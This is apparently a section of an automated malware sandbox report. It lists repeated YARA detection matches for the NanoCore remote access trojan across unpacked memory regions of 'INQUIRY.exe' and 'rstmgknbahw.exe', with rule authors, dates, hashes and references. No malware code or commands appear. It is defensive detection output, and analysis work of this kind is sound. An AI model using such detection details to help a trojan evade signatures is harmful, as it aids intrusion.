      Source: 6.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.2.rstmgknbahw.exe.3950e14.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.rstmgknbahw.exe.3950e14.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.0.INQUIRY.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.0.INQUIRY.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.0.INQUIRY.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.2.rstmgknbahw.exe.4940000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.rstmgknbahw.exe.4940000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.2.rstmgknbahw.exe.4940000.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.1.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.1.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.1.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.0.INQUIRY.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.0.INQUIRY.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.0.INQUIRY.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.0.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.0.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.0.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.2.rstmgknbahw.exe.638d50.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.rstmgknbahw.exe.638d50.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.2.rstmgknbahw.exe.638d50.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.2.rstmgknbahw.exe.394bfde.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.rstmgknbahw.exe.394bfde.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.rstmgknbahw.exe.394bfde.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.0.INQUIRY.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.0.INQUIRY.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.0.INQUIRY.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.0.INQUIRY.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.0.INQUIRY.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.0.INQUIRY.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.rstmgknbahw.exe.2311458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.rstmgknbahw.exe.2311458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.rstmgknbahw.exe.2311458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.0.INQUIRY.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.0.INQUIRY.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.0.INQUIRY.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.INQUIRY.exe.24e0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.INQUIRY.exe.24e0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.INQUIRY.exe.24e0000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.0.INQUIRY.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.0.INQUIRY.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.0.INQUIRY.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 1.2.INQUIRY.exe.22e0000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 1.2.INQUIRY.exe.22e0000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 1.2.INQUIRY.exe.22e0000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.INQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.INQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.INQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
